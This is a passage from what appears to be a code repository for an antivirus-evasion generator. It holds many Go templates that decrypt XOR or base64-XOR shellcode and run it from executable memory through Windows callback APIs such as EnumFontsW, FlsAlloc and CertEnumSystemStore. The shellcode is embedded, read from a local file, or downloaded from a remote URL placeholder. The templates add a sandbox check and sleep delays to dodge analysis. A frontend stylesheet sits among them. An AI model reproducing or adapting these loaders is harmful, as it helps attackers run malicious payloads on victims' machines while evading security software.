CertEnumSystemStore = Crypt32.NewProc("CertEnumSystemStore") 25 | ) 26 | 27 | func Callback(shellcode []byte) { 28 | addr, _, err := 
VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 29 | if err != nil && err.Error() != "The operation completed successfully." { 30 | syscall.Exit(0) 31 | } 32 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 33 | CertEnumSystemStore.Call(windows.CERT_SYSTEM_STORE_CURRENT_USER, 0, 0, addr) 34 | 35 | } 36 | 37 | func XorDecrypt(plaintext []byte, key []byte) []byte { 38 | ciphertext := make([]byte, len(plaintext)) 39 | keyLength := len(key) 40 | for i, byte := range plaintext { 41 | keyByte := key[i%keyLength] 42 | encryptedByte := byte ^ keyByte 43 | ciphertext[i] = encryptedByte 44 | } 45 | return ciphertext 46 | } 47 | 48 | func DecryptData(v2 string) []byte { 49 | key := []byte{{{Key}}} 50 | v22, _ := base64.StdEncoding.DecodeString(v2) 51 | v222 := XorDecrypt(v22, key) 52 | return v222 53 | } 54 | 55 | func main() { 56 | args := os.Args[0] 57 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 58 | os.Exit(0) 59 | } 60 | 61 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 62 | if err != nil { 63 | return 64 | } 65 | byteData := DecryptData(string(ciphertext)) 66 | Callback(byteData) 67 | } 68 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/xor/EMBEDDED/go_EnumResourceTypesExW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | dummy [522]byte 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | NULL = 0 19 | RESOURCE_ENUM_VALIDATE = 0x0008 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 26 | LoadLibraryW = kernel32.NewProc("LoadLibraryW") 27 | EnumResourceTypesExW = 
kernel32.NewProc("EnumResourceTypesExW") 28 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 34 | 35 | p1, _ := syscall.UTF16PtrFromString("Kernel32.dll") 36 | dll1, _, _ := LoadLibraryW.Call(uintptr(unsafe.Pointer(p1))) 37 | EnumResourceTypesExW.Call(dll1, addr, NULL, RESOURCE_ENUM_VALIDATE, NULL) 38 | } 39 | 40 | func XorDecrypt(plaintext []byte, key []byte) []byte { 41 | ciphertext := make([]byte, len(plaintext)) 42 | keyLength := len(key) 43 | for i, byte := range plaintext { 44 | keyByte := key[i%keyLength] 45 | encryptedByte := byte ^ keyByte 46 | ciphertext[i] = encryptedByte 47 | } 48 | return ciphertext 49 | } 50 | 51 | func DecryptData(shellcode []byte) []byte { 52 | key := []byte{{{Key}}} 53 | decryptShellcode := XorDecrypt(shellcode, key) 54 | return decryptShellcode 55 | } 56 | 57 | func main() { 58 | args := os.Args[0] 59 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 60 | os.Exit(0) 61 | } 62 | 63 | ciphertext := []byte{{{Shellcode}}} 64 | byteData := DecryptData(ciphertext) 65 | Callback(byteData) 66 | } 67 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/xor/REMOTE/go_VirtualAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import( 4 | "golang.org/x/sys/windows" 5 | "time" 6 | "unsafe" 7 | "math/rand" 8 | "os" 9 | "github.com/valyala/fasthttp" 10 | "syscall" 11 | ) 12 | 13 | func XorDecrypt(plaintext []byte, key []byte) []byte { 14 | ciphertext := make([]byte, len(plaintext)) 15 | keyLength := len(key) 16 | for i, byte := range plaintext { 17 | keyByte := key[i % keyLength] 18 | encryptedByte := byte ^ keyByte 19 | ciphertext[i] = encryptedByte 20 | } 21 
| return ciphertext 22 | } 23 | 24 | func DecryptData(v2 []byte) []byte { 25 | key := []byte{{{Key}}} 26 | v222 := XorDecrypt(v2, key) 27 | return v222 28 | } 29 | 30 | func WriteMemory(inbuf []byte, destination uintptr) { 31 | for index := uint32(0); index < uint32(len(inbuf)); index++ { 32 | writePtr := unsafe.Pointer(destination + uintptr(index)) 33 | v := (*byte)(writePtr) 34 | *v = inbuf[index] 35 | } 36 | } 37 | 38 | func Ldr1(calc []byte) { 39 | 40 | mKernel32, _ := syscall.LoadDLL("kernel32.dll") 41 | fVirtualAlloc, _ := mKernel32.FindProc("VirtualAlloc") 42 | calc_len := uintptr(len(calc)) 43 | Ptr1, _, _ := fVirtualAlloc.Call(uintptr(0), calc_len, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE) 44 | WriteMemory(calc, Ptr1) 45 | syscall.SyscallN(Ptr1, 0, 0, 0, 0) 46 | } 47 | 48 | func Sleeeep() { 49 | res := 1 50 | for i := 0; i < 5; i++ { 51 | number := rand.Intn(900) + 100 52 | res *= number 53 | } 54 | time.Sleep(10 * time.Second) 55 | } 56 | 57 | 58 | func fetchShellcode() []byte { 59 | 60 | url := "{{REMOTE_URL}}" 61 | 62 | _, body, _ := fasthttp.Get(nil, url) 63 | 64 | return body 65 | } 66 | 67 | func main() { 68 | 69 | args := os.Args[0] 70 | if (args[10] == 92 && (args[0] == 99 || args[0] == 67)) { 71 | os.Exit(0) 72 | } 73 | 74 | Sleeeep() 75 | 76 | ciphertext := fetchShellcode() 77 | Sleeeep() 78 | byteData := DecryptData(ciphertext) 79 | 80 | Ldr1(byteData) 81 | 82 | } -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/base64Xor/LOCAL/go_FlsAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | if1 [0]byte 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | NULL = 0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 23 | ntdll = 
syscall.NewLazyDLL("ntdll.dll") 24 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 25 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 26 | FlsAlloc = kernel32.NewProc("FlsAlloc") 27 | FlsSetValue = kernel32.NewProc("FlsSetValue") 28 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 34 | dIndex, _, _ := FlsAlloc.Call(addr) 35 | dummy, _ := syscall.UTF16PtrFromString("dummy") 36 | FlsSetValue.Call(dIndex, (uintptr)(unsafe.Pointer(dummy))) 37 | } 38 | 39 | func XorDecrypt(plaintext []byte, key []byte) []byte { 40 | ciphertext := make([]byte, len(plaintext)) 41 | keyLength := len(key) 42 | for i, byte := range plaintext { 43 | keyByte := key[i%keyLength] 44 | encryptedByte := byte ^ keyByte 45 | ciphertext[i] = encryptedByte 46 | } 47 | return ciphertext 48 | } 49 | 50 | func DecryptData(v2 string) []byte { 51 | key := []byte{{{Key}}} 52 | v22, _ := base64.StdEncoding.DecodeString(v2) 53 | v222 := XorDecrypt(v22, key) 54 | return v222 55 | } 56 | 57 | func main() { 58 | args := os.Args[0] 59 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 60 | os.Exit(0) 61 | } 62 | 63 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 64 | if err != nil { 65 | return 66 | } 67 | byteData := DecryptData(string(ciphertext)) 68 | Callback(byteData) 69 | } 70 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/xor/REMOTE/go_EnumFontsW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | "github.com/valyala/fasthttp" 9 | ) 10 | 11 | var ( 12 | timer int 13 | dummy [522]byte 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 
0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | NULL = 0 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | User32 = syscall.NewLazyDLL("User32.dll") 27 | Gdi32 = syscall.NewLazyDLL("Gdi32.dll") 28 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 29 | GetDC = User32.NewProc("GetDC") 30 | EnumFontsW = Gdi32.NewProc("EnumFontsW") 31 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 32 | ) 33 | 34 | func Callback(shellcode []byte) { 35 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 37 | dc, _, _ := GetDC.Call(NULL) 38 | EnumFontsW.Call(dc, NULL, addr, NULL) 39 | } 40 | 41 | func XorDecrypt(plaintext []byte, key []byte) []byte { 42 | ciphertext := make([]byte, len(plaintext)) 43 | keyLength := len(key) 44 | for i, byte := range plaintext { 45 | keyByte := key[i%keyLength] 46 | encryptedByte := byte ^ keyByte 47 | ciphertext[i] = encryptedByte 48 | } 49 | return ciphertext 50 | } 51 | 52 | func DecryptData(shellcode []byte) []byte { 53 | key := []byte{{{Key}}} 54 | decryptShellcode := XorDecrypt(shellcode, key) 55 | return decryptShellcode 56 | } 57 | 58 | func fetchShellcode(url string) []byte { 59 | _, body, _ := fasthttp.Get(nil, url) 60 | return body 61 | } 62 | 63 | func main() { 64 | args := os.Args[0] 65 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 66 | os.Exit(0) 67 | } 68 | 69 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 70 | byteData := DecryptData(ciphertext) 71 | Callback(byteData) 72 | } 73 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/base64Xor/EMBEDDED/go_EnumResourceTypesExW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 
| "unsafe" 8 | ) 9 | 10 | var ( 11 | timer int 12 | dummy [522]byte 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | NULL = 0 20 | RESOURCE_ENUM_VALIDATE = 0x0008 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | LoadLibraryW = kernel32.NewProc("LoadLibraryW") 28 | EnumResourceTypesExW = kernel32.NewProc("EnumResourceTypesExW") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | 36 | p1, _ := syscall.UTF16PtrFromString("Kernel32.dll") 37 | dll1, _, _ := LoadLibraryW.Call(uintptr(unsafe.Pointer(p1))) 38 | EnumResourceTypesExW.Call(dll1, addr, NULL, RESOURCE_ENUM_VALIDATE, NULL) 39 | } 40 | 41 | func XorDecrypt(plaintext []byte, key []byte) []byte { 42 | ciphertext := make([]byte, len(plaintext)) 43 | keyLength := len(key) 44 | for i, byte := range plaintext { 45 | keyByte := key[i%keyLength] 46 | encryptedByte := byte ^ keyByte 47 | ciphertext[i] = encryptedByte 48 | } 49 | return ciphertext 50 | } 51 | 52 | func DecryptData(v2 string) []byte { 53 | key := []byte{{{Key}}} 54 | v22, _ := base64.StdEncoding.DecodeString(v2) 55 | v222 := XorDecrypt(v22, key) 56 | return v222 57 | } 58 | 59 | func main() { 60 | args := os.Args[0] 61 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 62 | os.Exit(0) 63 | } 64 | 65 | ciphertext := "{{Shellcode}}" 66 | byteData := DecryptData(ciphertext) 67 | Callback(byteData) 68 | } 69 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/base64Xor/LOCAL/go_EnumChildWindows.go: 
-------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | timer int 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | CAL_SMONTHNAME1 = 0x00000015 19 | ENUM_ALL_CALENDARS = 0xffffffff 20 | SORT_DEFAULT = 0x0 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | User32 = syscall.NewLazyDLL("User32.dll") 27 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 28 | EnumChildWindows = User32.NewProc("EnumChildWindows") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | if err != nil && err.Error() != "The operation completed successfully." { 35 | syscall.Exit(0) 36 | } 37 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 38 | EnumChildWindows.Call(0, addr, 0) 39 | } 40 | 41 | func XorDecrypt(plaintext []byte, key []byte) []byte { 42 | ciphertext := make([]byte, len(plaintext)) 43 | keyLength := len(key) 44 | for i, byte := range plaintext { 45 | keyByte := key[i%keyLength] 46 | encryptedByte := byte ^ keyByte 47 | ciphertext[i] = encryptedByte 48 | } 49 | return ciphertext 50 | } 51 | 52 | func DecryptData(v2 string) []byte { 53 | key := []byte{{{Key}}} 54 | v22, _ := base64.StdEncoding.DecodeString(v2) 55 | v222 := XorDecrypt(v22, key) 56 | return v222 57 | } 58 | 59 | func main() { 60 | args := os.Args[0] 61 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 62 | os.Exit(0) 63 | } 64 | 65 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 66 | if err != nil { 67 | return 68 | } 69 | byteData := DecryptData(string(ciphertext)) 70 | Callback(byteData) 71 | } 72 | 
-------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/style.css: -------------------------------------------------------------------------------- 1 | :root { 2 | font-family: Inter, Avenir, Helvetica, Arial, sans-serif; 3 | font-size: 16px; 4 | line-height: 24px; 5 | font-weight: 400; 6 | 7 | color-scheme: light dark; 8 | color: rgba(255, 255, 255, 0.87); 9 | background-color: #242424; 10 | 11 | font-synthesis: none; 12 | text-rendering: optimizeLegibility; 13 | -webkit-font-smoothing: antialiased; 14 | -moz-osx-font-smoothing: grayscale; 15 | -webkit-text-size-adjust: 100%; 16 | 17 | /* 自定义 */ 18 | --color: #333333; 19 | --background-color: #f4f5f5; 20 | --bg-header: #ffffff; 21 | --header-text-color: #121212; 22 | } 23 | 24 | body { 25 | margin: 0; 26 | display: flex; 27 | place-items: center; 28 | min-width: 320px; 29 | min-height: 100vh; 30 | color: var(--color); 31 | background-color: var(--background-color); 32 | } 33 | 34 | a { 35 | font-weight: 500; 36 | color: #646cff; 37 | text-decoration: inherit; 38 | } 39 | a:hover { 40 | color: #535bf2; 41 | } 42 | /* #滚动条 43 | ================================================== */ 44 | ::-webkit-scrollbar { 45 | width: 0.35rem; 46 | height: 0.25rem; 47 | background-image: linear-gradient(#ffffff 100%, #ffffff 100%); 48 | } 49 | ::-webkit-scrollbar-track { 50 | border-radius: 0; 51 | } 52 | ::-webkit-scrollbar-thumb { 53 | background-image: linear-gradient(#3798e8 100%, #3798e8 100%); 54 | transition: all 0.2s; 55 | } 56 | ::-webkit-scrollbar-thumb:hover { 57 | background-color: rgba(95, 95, 95, 0.7); 58 | } 59 | 60 | /* #Element-PLus定制 61 | ================================================== */ 62 | 63 | /* #系统布局 64 | ================================================== */ 65 | 66 | #app { 67 | max-width: 1280px; 68 | margin: 0 auto; 69 | padding: 2rem; 70 | text-align: center; 71 | } 72 | 73 | @media (prefers-color-scheme: light) { 74 | :root { 75 | color: 
#213547; 76 | background-color: var(--background-color); 77 | } 78 | a:hover { 79 | color: #747bff; 80 | } 81 | button { 82 | background-color: #f9f9f9; 83 | } 84 | } 85 | -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/xor/REMOTE/go_CertEnumSystemStore.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | "github.com/valyala/fasthttp" 9 | "golang.org/x/sys/windows" 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 20 | ntdll = syscall.NewLazyDLL("ntdll.dll") 21 | Crypt32 = syscall.NewLazyDLL("Crypt32.dll") 22 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 23 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 24 | CertEnumSystemStore = Crypt32.NewProc("CertEnumSystemStore") 25 | ) 26 | 27 | func Callback(shellcode []byte) { 28 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 29 | if err != nil && err.Error() != "The operation completed successfully." 
{ 30 | syscall.Exit(0) 31 | } 32 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 33 | CertEnumSystemStore.Call(windows.CERT_SYSTEM_STORE_CURRENT_USER, 0, 0, addr) 34 | 35 | } 36 | 37 | func XorDecrypt(plaintext []byte, key []byte) []byte { 38 | ciphertext := make([]byte, len(plaintext)) 39 | keyLength := len(key) 40 | for i, byte := range plaintext { 41 | keyByte := key[i%keyLength] 42 | encryptedByte := byte ^ keyByte 43 | ciphertext[i] = encryptedByte 44 | } 45 | return ciphertext 46 | } 47 | 48 | func DecryptData(shellcode []byte) []byte { 49 | key := []byte{{{Key}}} 50 | decryptShellcode := XorDecrypt(shellcode, key) 51 | return decryptShellcode 52 | } 53 | 54 | func fetchShellcode(url string) []byte { 55 | _, body, _ := fasthttp.Get(nil, url) 56 | return body 57 | } 58 | 59 | func main() { 60 | args := os.Args[0] 61 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 62 | os.Exit(0) 63 | } 64 | 65 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 66 | byteData := DecryptData(ciphertext) 67 | Callback(byteData) 68 | } 69 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/xor/LOCAL/go_EnumResourceTypesExW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | dummy [522]byte 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | NULL = 0 19 | RESOURCE_ENUM_VALIDATE = 0x0008 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 26 | LoadLibraryW = kernel32.NewProc("LoadLibraryW") 27 | EnumResourceTypesExW = kernel32.NewProc("EnumResourceTypesExW") 28 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 29 | ) 30 | 31 | func 
Callback(shellcode []byte) { 32 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 34 | 35 | p1, _ := syscall.UTF16PtrFromString("Kernel32.dll") 36 | dll1, _, _ := LoadLibraryW.Call(uintptr(unsafe.Pointer(p1))) 37 | EnumResourceTypesExW.Call(dll1, addr, NULL, RESOURCE_ENUM_VALIDATE, NULL) 38 | } 39 | 40 | func XorDecrypt(plaintext []byte, key []byte) []byte { 41 | ciphertext := make([]byte, len(plaintext)) 42 | keyLength := len(key) 43 | for i, byte := range plaintext { 44 | keyByte := key[i%keyLength] 45 | encryptedByte := byte ^ keyByte 46 | ciphertext[i] = encryptedByte 47 | } 48 | return ciphertext 49 | } 50 | 51 | func DecryptData(shellcode []byte) []byte { 52 | key := []byte{{{Key}}} 53 | decryptShellcode := XorDecrypt(shellcode, key) 54 | return decryptShellcode 55 | } 56 | 57 | func main() { 58 | args := os.Args[0] 59 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 60 | os.Exit(0) 61 | } 62 | 63 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 64 | if err != nil { 65 | return 66 | } 67 | byteData := DecryptData(ciphertext) 68 | Callback(byteData) 69 | } 70 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/xor/EMBEDDED/go_SymEnumProcesses.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | FALSE = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 22 | ntdll = syscall.NewLazyDLL("ntdll.dll") 23 | Dbghelp = syscall.NewLazyDLL("Dbghelp.dll") 24 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 25 | GetCurrentProcess = 
kernel32.NewProc("GetCurrentProcess") 26 | SymInitialize = Dbghelp.NewProc("SymInitialize") 27 | SymEnumProcesses = Dbghelp.NewProc("SymEnumProcesses") 28 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | if err != nil && err.Error() != "The operation completed successfully." { 34 | syscall.Exit(0) 35 | } 36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 37 | Proces, _, _ := GetCurrentProcess.Call() 38 | SymInitialize.Call(Proces, 0, FALSE) 39 | SymEnumProcesses.Call(addr, 0) 40 | } 41 | 42 | func XorDecrypt(plaintext []byte, key []byte) []byte { 43 | ciphertext := make([]byte, len(plaintext)) 44 | keyLength := len(key) 45 | for i, byte := range plaintext { 46 | keyByte := key[i%keyLength] 47 | encryptedByte := byte ^ keyByte 48 | ciphertext[i] = encryptedByte 49 | } 50 | return ciphertext 51 | } 52 | 53 | func DecryptData(shellcode []byte) []byte { 54 | key := []byte{{{Key}}} 55 | decryptShellcode := XorDecrypt(shellcode, key) 56 | return decryptShellcode 57 | } 58 | 59 | func main() { 60 | args := os.Args[0] 61 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 62 | os.Exit(0) 63 | } 64 | 65 | ciphertext := []byte{{{Shellcode}}} 66 | byteData := DecryptData(ciphertext) 67 | Callback(byteData) 68 | } 69 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/xor/REMOTE/go_FlsAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | "github.com/valyala/fasthttp" 9 | ) 10 | 11 | var ( 12 | if1 [0]byte 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | NULL = 0 20 | ) 21 | 22 | var ( 23 | kernel32 = 
syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 26 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 27 | FlsAlloc = kernel32.NewProc("FlsAlloc") 28 | FlsSetValue = kernel32.NewProc("FlsSetValue") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | dIndex, _, _ := FlsAlloc.Call(addr) 36 | dummy, _ := syscall.UTF16PtrFromString("dummy") 37 | FlsSetValue.Call(dIndex, (uintptr)(unsafe.Pointer(dummy))) 38 | } 39 | 40 | func XorDecrypt(plaintext []byte, key []byte) []byte { 41 | ciphertext := make([]byte, len(plaintext)) 42 | keyLength := len(key) 43 | for i, byte := range plaintext { 44 | keyByte := key[i%keyLength] 45 | encryptedByte := byte ^ keyByte 46 | ciphertext[i] = encryptedByte 47 | } 48 | return ciphertext 49 | } 50 | 51 | func DecryptData(shellcode []byte) []byte { 52 | key := []byte{{{Key}}} 53 | decryptShellcode := XorDecrypt(shellcode, key) 54 | return decryptShellcode 55 | } 56 | 57 | func fetchShellcode(url string) []byte { 58 | _, body, _ := fasthttp.Get(nil, url) 59 | return body 60 | } 61 | 62 | func main() { 63 | args := os.Args[0] 64 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 65 | os.Exit(0) 66 | } 67 | 68 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 69 | byteData := DecryptData(ciphertext) 70 | Callback(byteData) 71 | } 72 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/base64Xor/REMOTE/go_EnumFontsW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "github.com/valyala/fasthttp" 10 
| ) 11 | 12 | var ( 13 | timer int 14 | dummy [522]byte 15 | ) 16 | 17 | const ( 18 | MEM_COMMIT = 0x1000 19 | MEM_RESERVE = 0x2000 20 | PAGE_EXECUTE_READWRITE = 0x40 21 | NULL = 0 22 | ) 23 | 24 | var ( 25 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 26 | ntdll = syscall.NewLazyDLL("ntdll.dll") 27 | User32 = syscall.NewLazyDLL("User32.dll") 28 | Gdi32 = syscall.NewLazyDLL("Gdi32.dll") 29 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 30 | GetDC = User32.NewProc("GetDC") 31 | EnumFontsW = Gdi32.NewProc("EnumFontsW") 32 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 33 | ) 34 | 35 | func Callback(shellcode []byte) { 36 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 37 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 38 | dc, _, _ := GetDC.Call(NULL) 39 | EnumFontsW.Call(dc, NULL, addr, NULL) 40 | } 41 | 42 | func XorDecrypt(plaintext []byte, key []byte) []byte { 43 | ciphertext := make([]byte, len(plaintext)) 44 | keyLength := len(key) 45 | for i, byte := range plaintext { 46 | keyByte := key[i%keyLength] 47 | encryptedByte := byte ^ keyByte 48 | ciphertext[i] = encryptedByte 49 | } 50 | return ciphertext 51 | } 52 | 53 | func DecryptData(v2 string) []byte { 54 | key := []byte{{{Key}}} 55 | v22, _ := base64.StdEncoding.DecodeString(v2) 56 | v222 := XorDecrypt(v22, key) 57 | return v222 58 | } 59 | 60 | func fetchShellcode(url string) []byte { 61 | _, body, _ := fasthttp.Get(nil, url) 62 | return body 63 | } 64 | 65 | func main() { 66 | args := os.Args[0] 67 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 68 | os.Exit(0) 69 | } 70 | 71 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 72 | 